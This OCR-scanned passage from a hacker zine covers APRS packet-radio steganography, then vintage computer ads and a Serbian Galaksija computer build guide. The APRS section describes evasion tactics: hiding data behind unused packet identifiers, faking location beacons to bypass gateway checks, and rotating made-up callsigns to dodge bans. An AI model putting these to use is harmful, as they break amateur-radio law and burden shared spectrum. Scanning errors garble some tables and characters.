APRS and other packet radio protocols. 

If you would like to get fancy, I recommend two additional pieces of equipment. Get a dual-band 
radio with TNC support, such as the Kenwood TM-D7xx or TH-D72A. The TNC will interpret packets in 
hardware, freeing you from DSP headaches. You will also want a general purpose wide-band receiver with 
discriminator (unadulterated audio) output; ordinary folks call this a scanner. 





9.1 The Protocol 


As mentioned before, APRS uses AX.25 for transport. More specifically, APRS data is contained in AX.25 
Unnumbered Information (UI) frames, in the information field. The protocol is completely connectionless; 
there is neither state nor any expectation of a response for a given packet.?? This is rather handy for simple 
systems, since you will only need a single packet consumer, and the rest of your state machine is entirely up 
to you. Because of its simplicity, APRS can be easily implemented in microcontrollers. 

А simple APRS message packet looks as follows: 





?ljt64stego by Drapeau (KA1OVM) and Dukes, 2014 

2230 says the preacher man but... I don't go by what he says. 

23This is the exact opposite of your Wi-Fi, where every data frame is acknowledged, and no more data is sent unless either 
the ACK arrives or a timeout is reached. 
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APRS Data 


] — 256 Bytes 
APRS Data 


Extension 


| Comment 





Figure 6: APRS Data contained in the AX.25 information field 


NOCALL-9>N1CALL-9,WIDE1-1,WIDE2-2::N1CALL-9 :This is a test for APRS messages{i 


Dissecting its structure, we will find: 


1. The path element: NOCALL-9>N1CALL-9,WIDE1-1,WIDE2-2 
2. A colon (:) delimiting the end of the path and the beginning of the packet data. 


3. The packet type identified by a single character, : for messages. 





4. After that, whatever format the packet type specifies. In the case of à message, a colon-delimited 
recipient callsign, followed by the text and a 1 bracket followed by a number, indicating the line of the 
message, starting at one. 


The comment field is also susceptible to abuse, limited to printable ASCII data as the specification 
demands, “The comment may contain any printable ASCII characters (except | and ^, which are reserved 
for TNC channel switching). Depending on the DTI, the Comment field is used to include additional 
information besides what is sent in the Data field, mostly for telemetry uses. Coordinates are encoded using 
Вазе-91. 

The wealth of information provided in the original protocol specification should be more than enough to 
figure out ways to conceal your own data in different packet types. Of particular interest are the mechanisms 
for compressed coordinates and telemetry, weather reports, and bulletin messages. While these have size 
limitations, leveraging the unused DTIs as described in the next section allows for crafty ways to chain 
multiple packets together. 








9.2 Abusing Unused Data Type Identifiers (DTI) 


The APRS protocol defines multiple DTIs as unused or forbidden. These are often ignored by software and 
TNCs in actual radios, making them an ideal target for creative reuse. Because it would be trivial to detect 
and actively monitor for intentional use of the unused DTIs, a better approach is to leverage them in a way 
that provides somewhat plausible deniability. 








1. Prepare APRS Data contents for a given DTI. 


2. Find nearest unused DTI, possibly identifying the unused DTIs that require the least amount of bits 
to corrupt so that the DTI isn't “too far" from the one corresponding to the data we have prepared. 
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Valid DTI neighboring? 

0x22 Unused Ox21 (position without times- 
nje re anl 0125 (WX 
0x26 Reserved (“map feature") Ox25 (MicroFinder) and 0x27 


0x27 and 0x29 (Item) 


Ox2e Reserved (Space weather) (position with timestamp 
sans messaging) 


0530-0585 0х3а (Message) 





Figure 7: AX.25 Unnumbered Information (UI) frame structure 


3. Proceed to send the packet contained an invalid DTI that is unused yet contains seemingly valid data 
for an adjacent DTI. 


Unused DTIs that are one position away from another include 0x21 and 0x22 (position without timestamp 
versus unused) Table 1 contains some of the interesting unused identifiers up for grabs; please refer to the 
APRS Protocol Reference?" for the rest of them. DTIs involved in TNC operation should be avoided, unless 
the TNC behavior can be abused constructively. 

The benefit of hiding data in an otherwise valid APRS Data segment with an incorrect (unused) DTI is 
that clients—including built-in TNCs—will ignore the packet and not attempt to decode its contents. 


9.2.1 Third-party and User Defined Packets 


Two special DTIs exist that allow for packet-in-packet protocol tricks: the third-party and user-defined 
packets. These have special quirks associated with them, and the way TNCs handle them is not standardized. 
This is both a good and a bad thing. For instance, the Kenwood 'TM-D7xx’s built-in TNC will ignore third- 
party packets entirely if it cannot parse them. 


24^unzip pocorgtfo09.pdf aprs101.pdf 
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However, Internet Gateways will also ignore all user-defined packets and impose additional restrictions 
the third-party DTI. This is the biggest motivator for actually reading the source code of APRS Internet 
gateway software. For example: 


static int parse aprs body(struct pbuf t «pb, const char xinfo start) 


1 


case '[': 
pb—>packettype |= T USERDEF; 


return 0; 


case '}': 
pb—>packettype |= T 3RDPARTY; 
return parse aprs 3rdparty(pb, info start); 





NOCALL-9>N1CALL-9,WIDE1-1,WIDE2-2::N1CALL-9 :This is a test for APRS messages{1 


9.3 Internet Gateways 


Gateways between the Internet and APRS radios are known as Internet Gateways or iGates. Typically iGates 
are used to forward APRS beacons heard over radio to some website, but there are a lot more interesting 
things we could do with them. 


9.3.1 Tricks with iGates 


Some iGates support transmitting data from the Internet out to radio, effectively bridging the local КЕ 
spectrum to the APRS-IS network. 

There is no official way to list iGates, so our best bet is connecting to the backbone servers they report 
to, passively listening for frames and beacons that announce their presence. We would also like to distinguish 
iGates that are capable of transmitting from those that only receive. When we find some such iGates, they 
allow us to perform some gnarly tricks! 

We can send an APRS message from an Internet-only host in Asia to an individual driving in Pittsburgh 
with only a radio receiver and а TNC. Hide locations of control sites by first proxying your packets through 
the Internet iGates, only to target your local RF nodes through a separate, sacrificial iGate bridge. 

The system is only limited by APRS-IS rules in terms of traffic congestion control. Because all RF nodes 
receive from and transmit to the same frequency, overlapping transmissions can and will reduce the ratio of 
successfully decoded packets for everyone else. Therefore, be neighborly! 





Traffic caps are enforced by the iGate operator's configuration. Commonly a given node, as identified 
by its callsign and SSID, will only be able to use the Internet- RF bridge for transmitting a fixed number of 
packets each minute. This is to prevent accidental jamming of the RF channel. 


9.3.2 Packet Validation and RF Digipeating 


Some architectural limitations of APRS need to be considered carefully. First, most iGates in the APRS-IS 
network will only digipeat packets to the КЕ side if the station is located within a fixed radius of so many 
kilometers. Second, we might not get to know if a given area has an iGate capable of bridging КЕ, or 
transmitting to RF. We can’t simple wait for a response, as APRS is а response-less protocol. Third, packets 
marked RFONLY in their path won't reach APRS-IS. Packets marked TCPIP won't reach RF nodes. iGates 
forcing or restricting either will be dead-ends if we aim to bridge over APRS-IS. Finally, user-defined packets 
are ignored by most of the APRS-IS infrastructure. For example, aprsc ignores them. Third-party packets 
are allowed, with caveats. 
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9.3.3 Bypassing Validation 





There аге а few ways to bypass the restrictions imposed on bridging КЕ in iGates that require geographical 
proximity. 

You can try to spoof your location by sending a beacon positioned at fake coordinates near the iGate. 
You can then send your actual data packets, remembering to regularly send a position beacon to the iGate 
to remain in the last-heard list. 

You could limit use of user-defined packets to RF side, operating a a rogue iGate that does not ignore 
them, instead transforming them to third-party or steganographic standard packets, delivered to APRS-IS. 
User-defined packets are not displayed by most equipment. This also applies to unused or obscure DTIs. 

To avoid potential roadblocks, the following considerations may help. If trying to reach the RF side, 
do not use (and verify that the iGate/ APRS-IS nodes don't use) TCPIP in the path. If trying to reach the 
Internet side, do not use RFONLY in the path. 'To avoid packet drops from rate limiting, throttle your packets, 
sending one every one to five minutes. 

Albeit completely illegal on the actual air, as an experiment in a controlled environment, automatically 
generated callsigns can be rotated to avoid being detected or banned from the system.?? Finally, client 
version strings, as used during registration with APRS-IS nodes, could be rotated and mimic real clients. 

Looking up standard TCP/IP “pivoting” techniques may help for accessing the APRS-IS network, but 
first and foremost, remember to be neighborly. 


9.3.4 International Space Station (ISS) and APRS 


Space, the final frontier! It suffices to say that a digipeater installed onboard the ISS makes APRS into the 
tool of choice for legal ruckus communications on a worldwide scale. So as long as the TNC of the ISS’ radio 
validates your packets, you can deliver your covert messages in a fully decentralized fashion!*° 

Whether commercial TNCs out there relay packets with unused DTIs is a question left to the reader as 
an exercise. 


9.4 Parting words: legal status of subterfuge in radio communications 


Amateur radio laws generally prohibit steganography and also encryption, with a few narrow exceptions.?" 


For example, the US Electronic Code of Federal Regulations 897.309 states, RTTY and data emissions using 
unspecified digital codes must not be transmitted for the purpose of obscuring the meaning of 
any communication.^??? Governments do monitor the airwaves where they care about them the most, 
and having your antennas, expensive equipment, or house ransacked sucks. Also keep in mind that amateur 
radio is self-policing; if you mess up and create a nuisance that affects everyone else, your future experiences 
with that small, tight-knit, but global community may be seriously soured. So be neighborly, have fun, and 
stay safe! 





— Vogelfrei 


25 Dont do this. Acting like an asshole on the radio is the surest way to convince a brilliant RF engineer to spend his 
retirement hunting you down. 

26 [m Heinlein's “Between the planets”, 1951, the same celestial path of the Circum- Terra station is used for a much less benign 
purpose: worldwide delivery of nukes. That book also introduced the idea of stealth technology vehicle with а radar-reflecting 
surface, before any scientific publications on the subject. Welcome to classic 1950s Sci-Fi. —P^ ML 

27 unzip pocorgtfo09.pdf encham.html #Encryption and Amateur Radio by KDOLIX 

28unzip pocorgtfo09.pdf part97.pdf 

29 Also note §97.217: Telemetry transmitted by an amateur station on or within 50 km of the Earth’s surface is not considered 
to be codes or ciphers intended to obscure the meaning of communications. 
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You have to SEE it to BELIEVE it! 


The Alpha Microsystems AM-100 is LIGHT 
YEARS ahead of everything else you've 
seen so far in the low cost computing field. 


For a FRACTION of what you'd normally 
pay for the SOFTWARE ALONE, you get a 
16-bit processor with ALL of these BIG- 
SYSTEM capabilities: 


MULTI-TASKING, MULTI-USER 
TIMESHARING 


* DEVICE INDEPENDENT I/O 

x ADVANCED FILE STRUCTURE 

х POWERFUL SYSTEM COMMANDS 

7 SOPHISTICATED TEXT EDITOR 

* FULL MACRO ASSEMBLER 

* LINE PRINTER SPOOLER 

7 RE-ENTRANT, MULTI-USER BASIC 
COMPILER 

х LARGE UTILITIES LIBRARY 


Yet, with all this it's still compatible 
with the S-100 BUS! 


If you like the Decsystem-10 operating 
system, if you like TECO ... if you like the 
PDP-11 instruction set... you'll LOVE the 
AM-100! 
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10 Napravi i ti Računar „Galaksija“ 


Voja Antonić 


This article on the Galaksija computer first appeared in the January 1984 special edition of Dejan Ris- 


tanovi 


с’ Yugoslavian science magazine, also called Galaksija. We reprint it as a salute to fine neighbors such 


as Mr. Antonić, to all those who build strange and lovely contraptions in their basement laboratories and 


then share them with the world. -PML 


10.1 Samogradnja računara ,galak- 
sija“ u stripu 
Evo nas, konačno, i na praktičnom delu po- 


sla. Očekuje nas ozbiljan ali prijatan rad, koji će 
biti nagrađen nesvakidašnjim zadovoljstvom što smo 
stvorili i oživeli jedan ovako inteligentan uređaj. Ne- 
mojte se obeshrabriti ako smatrate da nemate do- 
voljno iskustva: to je prvi i dobar znak da imate 
samokritičnog duha, a on vam je, verujte, u ovom 
poslu potrebniji od iskustva. Zastanite posle svakog, 
i najmanjeg i naoko beznačajnog detalja, i procenite 
da li je to dobro urađeno i — „galaksija“ će proraditi 
iz prve! 


10.1.1 Važne odluke 


Pre početka rada treba doneti nekoliko važnih 
odluka. Ргуо, da li želimo da ovakav sistem 
bude konačan ili ćemo ostaviti mogućnost da ga 


FarumanongrunanSnonogV aune, 8 
и 


u budućnosti proširujemo dodavanjem štampača, 
više memorije, programatora, ,muzičke kutijice“, i 
slično. АКо ne želimo ova proširenja — uštedeli 
smo višepolni konektor i jedno integrisano kolo 
(741.532, koje ćemo zameniti jednim kratkospoj- 
nikom obeleženim crticama na montažnoj shemi). 
Ako ste u nedoumici — mi vam savetujemo da ipak 
ugradite ova dva dela, mada za to ni posle neće biti 
kasno. 


Drugo pitanje je da li ćemo se opredeliti za nemo- 
dulisan video-signal ili modulisan (RF) signal slike. 
Nemodulisan video-signal ne zahteva ugradnju RF 
modulatora u računar i daje stabilniju i kvalitetniju 
sliku, ali se zato ne može priključiti na bilo koji te- 
levizor — neophodno je imati specijalni monitor ili 
crno-beli televizor sa dograđenim monitorskim ula- 
zom. Ovo ne zahteva nikakva dodatna ulaganja, ali 
je neophodno imati predznanja i iskustvo u radu 
sa TV prijemnicima. Dalje, takav televizor mora 
biti tranzistorski (cevni ne dolaze u obzir) i mora 
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Montažna shema: Raspored elemenata u računaru ,,Galaksija” 


imati mrežni transformator (a ne takozvanu ,vrucu 
šasiju“); najčešće su oba ova uslova ispunjena kod 
malih prenosnih crno-belih televizora kod kojih po- 
stoji spoljni priključak na akumulator od 12 V. Neke 
savete za dogradnju monitorskog ulaza na ovakav te- 
levizor ćemo opisati u daljem tekstu. Ali, ako ugra- 
dimo RF modulator, bićemo oslobođeni svih ovih 
problema i moći ćemo da se priključimo na antenski 
ulaz bilo kog televizora. 


Moraćemo, takođe, da odlučimo koje čipove 
ćemo smestiti na podnožja, a koje lemiti direktno 
na štampano kolo. Savetujemo vam jedino da za 
EPROM-e (2716 i 2732) koristite podnožja, a za 
ostalo se opredelite sami. Prednost podnožja je u 
tome što smanjuju rizik da upropastite neki čip i 
što je zamenom vrlo lako lokalizovati neispravan in- 
tegralac (naravno, ako takvog uopšte ima, odnosno 
ako eventualna krivica nije do neke druge kompo- 
nente), jer je razlemljivanje čipova izuzetno osetljiv 
posao. Podnožja, na žalost, ako nisu vrhunskog kva- 
liteta, lošim kontaktima češće prave probleme nego 
bilo koje druge komponente. Da bi bilo pouzdano, 
podnožje mora da bude vrlo kvalitetno, a to ponekad 
znači da je skuplje i od samog čipa. 





1 == 
ин зз. гл uu miu ин пи т uk s eut ur ei 
ва 23 


konsktor ха protdiicenje 





ulez іх ах 
ва ža 
"EAR" "міс" 
masa +5V 22V dicks Gink signal главе 
napajanje kasatni Izlaz za 


iz iapravljača 


izlaz /мјех 


monitor 


Veza sa spoljašnim svetom: Priključci i raspored izvoda na 


zadnjoj strain ,,Galaksije” 


_RASFORE RD PRI касею _ 
NA KONEKTORU 


1 N.C. 12 MASA 23 р @ 54 а з 
2 N.C. 13 MASA 24 D 1 $5 а 4 
з N.C. 14 MASA 25 р 2 56 n 5 
4 N.C. 15 MASA 26 D 3 37 A 18 
5 Masa 16 ик 27 D 4 58 A 9 
e MASA 17 а 15 28 р 5 39 A 8 
7 MASA 18 A 14 29 р 6 46 A 7 
8 MASA 19 IORGOG- zu D 7 41 а 6 
9 MASA га Mi- 51 A 0 42 A 12 
10 MASA 21 MREQ- 52 ^ 1 43 A 1% 
11 masa 22 MASA S3 A 2 44 А 11 





rmm 


Dvostruka štampa: | Konektor za proširenja u obliku 


štampanog kola 
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Mikroprocesor Z80A i EPROM 


Srce računara , Galaksija": 


2732 sa bejzik interpreterom 
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1. Pred nama је materijal koji smo sakupili за toliko muke i iz 
koga се za nekoliko časova da ,izraste" računar „galaksija. U 
dnu slike lako prepoznajemo tastere i kapice tastera sa utisnu- 
tim oznakama, desno su otpornici (svi su snage 1/8 W mada 
mogu da se koriste i otpornici veće snage), levo kondenzatori, 
a u sredini čipovi (integrisana kola). Posebnu pažnju treba 
obratiti na MOS i CMOS čipove. 


2. Pošto je štampano kolo jednoslojno, biće nam potrebno 


dosta kratkospojnika. Njih je najlakše izraditi od pune ba- 


karne žice izvađene iz popularne plavo-bele telefonske „ра- 


гїсе”. Olakšavajuća okolnost je što su dužine standardizo- 


vane na 5, 10, 20, 30 i 40 mm, pa je lako izrezati alatku za 
njihovo precizno savijanje (pri izradi ove jednostavne alatke 


treba voditi računa o prečniku žice). 
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3. Sklapanje računara započinjemo postavljanjem prvog krat- 
kospojnika, pažljivo gledajući montažnu shemu. Neki krat- 
kospojnici prolaze ispod čipova; ovo neće praviti probleme 
ako su kratkospojnici pedantno savijeni i ako leže uz samo 
štampano kolo. Pažnja! Ovo je pogled sa strane elemenata a 


ne, kako se može učiniti, sa strane vodova! 


— ее 


hes 


4. Kada okrenemo ploču da bismo zalemili prvi kratkospoj- 
nik, postaje nam jasno zašto montaža počinje od najnižih 
komponenata. Da smo, na primer, počeli od tastera, sve niše 


komponente bi prilikom docnijih lemljenja ispadale. Ako ni- 





kada niste lemili, dobro je da najpre malo eksperimentišete 
Vrh lemilice treba da bude dobro 


oblikovan turpijom, očišćen i kalajisan. Lemi se tako što se 


na nekoj drugoj pločici. 


sa jedne strane prinese tinol-žica, a sa druge dobro zagre- 
jani vrh lemilice. Treba paziti da tinola na lemnom mestu ne 
ostane previše. Ma koliko to paradoksalno zvučalo, u protiv- 


nom ćemo dobiti loš električni kontakt. 













FOR ANY CIOQUIT OF ӨР P ets 
50 ro 5000/75. 
WRI Е F st ELECTRICAL 
RI ==ENGINEER.= 





5. Svi kratkospojnici su postavljeni i zalemljeni. Pažljivo ih 
prebrojmo: treba da ih bude tačno 119. Ukoliko na vašem 
štampanom kolu neki nedostaje, moraćete ponovo da kon- 
sultujete montažnu shemu. Obratimo pažnju na čip 741,532: 
kao što smo rekli u uvodu, možemo ga zameniti kratkospoj- 
nikom (isprekidana linija na montažnoj shemi) ako ne želimo 
proširenja sistema preko konektora. 'To će onda biti 120-ti 


kratkospojnik. 





6. Sledeća faza je montaža otpornika , koja je u mnogo čemu 


slična montaži kratkospojnika dužine 10 mm. 
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7. Kod montaže čipova, Која je sledeća na redu, izuzetnu 
pažnju treba obratiti na orijentaciju, jer se i iskusnim pro- 
fesionalcima dešava da okrenu čip naopako. Neki čipovi su 
obeleženi polukružnim usekom kao na montažnoj shemi, a 
drugi ugraviranom tačkom pored nožice broj 1. Napomi- 
njemo da natpis na čipu nije baš uvek okrenut tako da počinje 
od prve nožice. Pošto će na ,,galaksijinom” štampanom kolu 
sa gornje strane biti odštampan raspored elemenata, ovde ne 


bi trebalo da bude nikakvih problema. 





8. Čipovi su postavljeni, ali ne svi — zasad su izostavljeni 
već pomenuti MOS i CMOS čipovi CD 4017, CD 4040, 6116, 
2716, 2732 i Z80A. Najbolje je da ih ostavimo za kraj, ali 
nema razloga da ne stavimo podnožja. Sada je trenutak da 
pre lemljenja još jednom proverimo da li je svaki čip na svom 


mestu i pravilno okrenut. Nije slučajno što ovaj savet po- 





navljamo: svako nestrpljenje i neopreznost prilikom montaže 


skupo se plaćaju u trenutku prvog uključenja. 





9. Lemljenje čipova je posebno osetljiv posao, jer su 
međusobna rastojanja nožica svega 2,54 mm, a često između 
njih prolazi i vod. Ako se dogodi da se nepažnjom napravi 
neželjeni most od tinola, skinućemo ga tako što ćemo na istom 
mestu rastopiti još (svežeg!) tinola, pa onda sve odstraniti u 


jednoj kapljici vrhom lemilice. 





10. Kondenzatori su sledeći po visini. Montirajmo, dakle, 
i njih. Najbolje je koristiti takozvane disk-kondenzatore jer 
su najmanjih dimenzija i najjeftiniji, ali ako ima problema 
kod nabavke — koristite onakve kakve imate. Kapacitet svih 
kondenzatora obeleženih slovom С nije kritičan, a još manje 
njihov probojni napon. Kondenzator C5 nećemo još monti- 
rati. Najverovatnije neće biti ni potreban, ako imamo odgo- 
varajući kvarc. Kad stignemo do puštanja u pogon, biće više 


reči o tome. 


New KODAK 
INSTAGRAPHIC™ 
CRT Imaging Outfit 
makes it simple 
and economical to 
picture computer — 
or video displays =. 
in full photographic color 


For ONLY 


*190 





*List Price 






TO ORDER, 
CALL NOW TOLL-FREE: 


1-800-328-5618. 


MINNESOTA RESIDENTS, CALL: 


= 1-800-322-0493. 
~ ~ = 
al ч 


Or use this coupon 
= and order by mail. 
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11. Tu за 1 dva tranzistora NPN tipa male snage, uz levu i de- 
snu ivicu ploče po jedan. Malo pažnje, i Код montaže nećemo 
pogrešiti: ako pogledamo tranzistor odozdo, videćemo da su 
mu nožice razmeštene kao da su na uglovima pravouglog rav- 
nostranog trougla. Isto su razmeštene i rupice za tranzi- 
stor na štampi. U levom gornjem uglu štampane ploče je 
i jedna mala dioda. Najčešće je katoda (koja je bliža sre- 
dini štampanog kola) obeležena jednim prstenom po obimu 
cilindričnog kućišta. 
á . t 





12. Uzbudenje svakako raste: stigli smo do tastature. Bez 
obzira da li smo masku sami izrezali od vitroplasta ili alumi- 
nijumskog lima, (što ne bismo preporučili čak ni najljućem 
neprijatelju) prema našem crtežu, ili smo je naručili i do- 
bili zajedno sa tasterima, ona nam je neophodna: bez nje bi 
se svaki taster klatio za sebe i verovatno bi se kapice češale 
jedna o drugu. Maska je samonoseća — nigde se, dakle, ne 


pričvršćuje za štampano kolo. 


= Sera. по Фолна ло 
[^ ZEIT eg DAS ia 
| = À 2 








13. Prvo ćemo u iviéne otvore maske staviti nekoliko ta- 15. Klik — klik — klik! Kapice tastera su na svojim mestima, 
stera, zasad bez kapice, a onda ih zalemiti tako da maska i sad već čitava stvar poprima ozbiljan oblik. Skoro da nas 
stabilno stoji. Obratimo pažnju da tasteri ne stoje naopako: mami pa da počnemo da pišemo program. Ali, strpljenja, 
na montažnoj shemi se vidi da su izvodi okrenuti ka nama. strpljenja. 


Kratkospojnici neće smetati, jer su postavljeni tačno između — ow 
tastera. Dalje će ići lako: postoji ukupno 55 tastera i svi su 


jednaki. 


НА 
16. Zapaziéemo da je jedna kapica tastera (sa oznakom 


RET i ENTER, što je isto), dvaput šira od ostalih. Опа 


se montira na dva tastera. Ako pažljivo pogledamo stazice 





\ 


14. Pošto je rad sa lemilicom priveden kraju, zalemićemo ili na štampanom kolu, videćemo da su kontakti ta dva tastera 
postaviti u podnožja MOS i CMOS čipove. Pažnja — ovi spojeni paralelno. Funkciju, dakle, ima samo jedan taster, a 
čipovi su veoma osetljivi na statički elektricitet. Svakako je drugi je tu samo iz mehaničkih razloga. 


dobro prvo proučiti članak ,opasne krivine". 
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17. Izbor utikaéa (*dZekova") ćemo prepustiti vama. Možete 
upotrebiti onakve kakve imate, ako su bar tropolni. Nama 
se čini da su standardni petopolni DIN-utikači sasvim upo- 
trebljivi, lako se nabavljaju (proizvodi ih Ei), nisu skupi, 
a za divno čudo — vrlo su pouzdani. Obzirom da imaju 
po pet kontakata, predlažemo raspored priključaka dat na 
montažnoj shemi. Dobra osobina ovakvog rasporeda je što 


slučajnom zamenom džekova nećemo napraviti havariju. 





18. 


tor, štampu smo prilagodili tako da je moguće montirati više 


Pošto kod nas nije baš lako pronaći višepolni konek- 


različitih tipova konektora, ako imaju standardni korak od 
2,54 mm. Kao najpovoljnije rešenje, mi smo odabrali doda- 
vanje još jedne male dvoslojne štampane pločice, koja je tako 
projektovana da na nju može da se priključi višežilni kabl sa 
44-polnim „ЕРСЕ” (“ivičnim”) konektorom, jer je takav tip 


najlakše nabaviti, a i cena mu je pristupačna. 
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19. Naravno, sad ćemo, kao što se radi i u proizvodnji, na- 
praviti finalnu kontrolu celog štampanog kola: prosvetlićemo 
ploču jakim svetlom izbliza i sa lemne strane vrlo pažljivo 
posmatrati svaku liniju. Minijaturni ,mostići" od tinola su 
česta pojava. Pogledajte zaokružen deo slike — mi smo na 
našoj štampi našli ne baš tako sitan most od tinola, koji je ko 


zna kako nastao na tako širokom prostoru između dve staze 





20. 


urednim štampanim kolom u uređaju koji će umeti da nam 


čistim 1 


Naš trud je nagrađen ovim lepim prizorom — 


višestruko uzvrati za uložen парог i strpljenje. ,Galaksija" 
će raditi za vas bolje od mnogih drugih elektronskih uređaja 
u ovom veku elektronike, ispoljavajući osobinu koju ćemo po 
prvi put sresti kod jedne naprave — опа će komunicirati sa 
nama na takav način da ćemo imati utisak da je postala član 
porodice. Zaista, nije neobično što mnogi svoj računar sma- 


traju svojim prijateljem. 


10.2 Pročitajte i ovo — Opasne kriv- 
ine 

Ako za sobom imate dosta sagradenih uredaja 
(koji su uz to još i proradili), svakako se nećete baš 
doslovno pridržavati svih naših uputstava. Ipak, po- 
stoje pravila koja ne smete prekršiti, jer biste time 
sigurno izazvali trajna oštećenja komponenata. Na- 
brojaćemo najbitnija. 


e Kratak spoj između pozitivnog i negativnog 
voda za napajanje računara će oštetiti stabi- 
lizator 7805. Neki proizvođači ugrađuju auto- 
matsko strujno ograničenje u ovaj čip, ali to 
nemojte da proveravate. Isto tako, slučajna 
zamena pozitivnog i negativnog voda od ispra- 
vljača do računara će sasvim sigurno biti fa- 
talna za sve čipove. 


e Skoro svi čipovi u računaru „galaksija“ imaju 
radi napon od - 5 V, pri čemu su dozvoljena 
odstupanja od +0,25 V. Integrisana kola će 
preživeti šokove do 7 V, dok su prekoračenja 
ovog napona opasna. 


e Kratak spoj bilo kog izlaza ТТТ, kola (to su 
čipovi serije 741.5...) sa pozitivnim vodom za 
napajanje će trajno oštetiti to kolo. Kratak 
spoj izlaza sa masom je bezopasan, i možemo 
ga slobodno primenjivati prilikom eksperimen- 
tisanja. Ovde treba samo paziti da se ne do- 
godi da veći broj izlaza istog čipa bude spojen 
sa masom istovremeno. 


e U slučaju loše sinhronizacije slike na ekranu 
monitora, eksperimentisaćemo sa različitim 
vrednostima otpornika R12, R13, R9 i 610. 
Nema nikakvih opasnosti ako R12 ili R13 nisu 
manji od 330 oma, i ako R10 nije manji od 40 
oma. 


e Priključivanje monitorskog izlaza (bez RF 
modulatora) na TV prijemnik sa ,vrućom 
šasijom“ je opasno ne samo za čipove, već i 
za vaš život. Zbog velike važnosti, ovoj temi 
smo posvetili poseban tekst ,Jednostavan za- 
hvat, fantastični efekti“. 


e Pošto su MOS i CMOS čipovi vrlo osetljivi 
na statički elektricitet, potrebno je pažljivo 
rukovati s njima. Verujući da je većina kon- 
struktora već upoznata sa tehnikom rada sa 
ovim čipovima (u računaru „galaksija“ to su 
CD4017, CD4040, 2716, 2732, 6116 i Z80A), 
navešćemo samo nekoliko osnovnih saveta: 
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e Poželjno je koristiti uzemljenu lemilicu. Ako 
nemamo takvu, možemo se poslužiti običnom, 
ako hladniji kraj metalnog dela lemilice 
(bliže ruci) obavijemo nekoliko puta bakarnom 
žicom, čiji drugi kraj spojimo sa uzemljenjem 
na šuko-utičnici. 


e Ako u prostoriji u kojoj radimo imamo sin- 
tetički tepih, statički potencijal našeg tela u 
odnosu na zemlju može da dostigne čak 300 
volti! То nas ne ugrožava mnogo, jer će se 
taj naboj ,isprazniti“ za vrlo kratko vreme 
kad dodirnemo neki uzemljeni predmet, ali 
ako se isprazni kroz nožicu MOS ili CMOS 
čipa — verovatno će ga učiniti neupotreblji- 
vim. Zato se takvi čipovi čuvaju u takozvanim 
anti-statičkim cevima, a mogu biti i utaknuti 
nožicama u specijalni provodni sunđer ili jed- 
nostavno umotani u staniol. 


e Naši čipovi će biti potpuno sigurni u toku le- 
mljenja ako napravimo još nekoliko namotaja 
neizolovane žice oko dela lemilice koji držimo 
rukom, a drugi kraj žice spojimo sa uzemlje- 
nim metalnim delom. Tako smo i mi, pošto 
dolazimo u dodir sa čipom, na istom potenci- 
jalu. 


e Kad jednom ugradimo čip, on više nije to- 
liko ugrožen, tako da se po završetku montaže 
možemo osloboditi svih mera predostrožnosti. 


10.3 Izrada kutije računara — Konac 
delo krasi 


Mehaničku koncepciju kutije prepuštamo vama, 
ali ćemo vam dati i jednu ideju: pošto na obodu 
osnovnog štampanog kola ima dovoljno bakra, stra- 
nice se mogu iseći od istog takvog vitroplasta i jed- 
nostavno zalemiti za ploču sa komponentama. Tako 
štampana ploča postaje mehanički osnov cele kutije, 
za šta vitroplast zadovoljava i najstrožije mehaničke 
zahteve. 
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2. Najpre treba obeležiti i očistiti tvrdom gumicom ili finim 


brusnim papirom sve spojne površine koje ćemo lemiti. Za- 


tim ćemo dobro zagrejati lemilicu od 24 ili 30 W i kalajisati 





očišćene površine. Biće lakše ako koristimo i pastu za lemlje- 


1. Pažljivo ćemo isplanirati dimenzije svakog dela kutije na 


; ae | | i je. 
papiru. Moramo tačno znati koja stranica preko koje prelazi "d 


na sastavima. Delovi se lako i precizno isecaju popularnim 
OLFA skalpelom, zasecanjem linije sa obe strane ploée. Posle 
toga, ako su Zljebovi dovoljno duboki, Јако je slomiti рјоси po 


zasečenoj liniji. Posle ovakvog sečenja finom turpijom treba 





obraditi ivice. Ivice koje se leme obrađuju se ravno, a slo- 





NEW SOFTWARE FOR: 


TRS-80 РЕТ 


[RITAN1750BJ ОЕ #1200] 







bodne ivice zaobljeno. 












Hitch up your horse sense, wind up your wits, load the computer, and If you enjoyed Microchess, you'll love Bulls e Низ". А 
get ready to play Bulls e Низ". It means spellbinding, sophisticated, NEW game of logic and luck developed by Michael 
Stimulating fun for the entire family. One, two players, or partners will O'Toole for the TRS-80 Level | and Level ||, Apple ог 
e at odds trying to beat each other or the computer. The action is fast Pet. Please specify computer model... Only $14.95. 
and furious. Completely interactive... Enjoy. Programs and cassettes 100% guaranteed. 30 da 


ORDERS: SEND CHECK OR MONEY ORDER TO: money back guarantee if not completely satisfied. 


Dealer inquiries invited. 


the COMPUTER BUS" ro. Box зотр GRAND RIVER, OHIO 44045 
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3. Pre lemljenja celog sastava, zalemićemo stranicu samo u 


nekoliko tačaka. Tako ćemo moći pažljivo da izvršimo kon- 





trolu i eventualne korekcije. Treba znati da je jednom za- 
lemljenu stranicu kutije praktično nemoguće razlemiti bez 


oštećenja. 








5. Posle stroge provere međusobnog položaja i ugla, za- 
lemićemo ceo sastav dve površine. Verovatno će biti po- 
trebno da posle svakih nekoliko centimetara sačekamo da se 
rashlađeni vrh lemilice ponovo zagreje. Možda bi ovaj pro- 


blem bio rešen malo jačom lemilicom, ali je to pomalo opasno 





rešenje: pregrejani bakar se odlepljuje od vitroplasta. 


^ 
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4. Kod lemljenja stranica treba obratiti pažnju na skupljanje 
legure kalaj-olovo pri hlađenju: ako želimo prav ugao, po- 
stavićemo ploče pod tupim uglom (gledano sa strane sa koje 
se lemi; na slici je to donja strana), jer će posle lemljenja 


tinol ,povući" ploče jednu prema drugoj. Tako ćemo posle 


hlađenja dobiti prav ugao. 


Р.С. сатаз made simple=with СОРУРАТ! 


. Prepare the 1X artwork, using an opaque layout aid such as Chartpak, Bishop Graphics, or other 
similar product. 
2. Make a negative: Place the artwork face down, cover with the negative material colored film side 
up (we recommend Scotchcal products), and expose with the Copydat. Typical exposure time is 
1.5 minutes. 


. Develop the negative in developer provided with negative material. 
. Attach negative to pre-sensitized face of copper board. Place board and negative face down on 
Copydat. Expose. Typical exposure time: 30 seconds. : 


. Save the negative for reuse, and develop the board in the developer provided. 
. Etch the board. 
. As a finishing touch, tin the board to avoid oxidation of the copper and to improve solderability. 


Result: a custom, high quality, single-sided P.C. board. 
With careful alignment, you can make doublesided boards too! 


Alternatively, buy high-quality hardware assemblers from us — and these are predrilled as well (and 
feature plated-through holes): 


